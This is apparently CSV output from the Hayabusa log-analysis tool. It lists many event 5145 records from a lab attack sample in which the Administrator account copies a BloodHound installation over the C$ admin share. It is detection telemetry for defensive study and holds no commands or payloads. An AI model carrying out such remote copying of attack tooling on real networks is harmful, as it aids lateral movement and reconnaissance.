2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
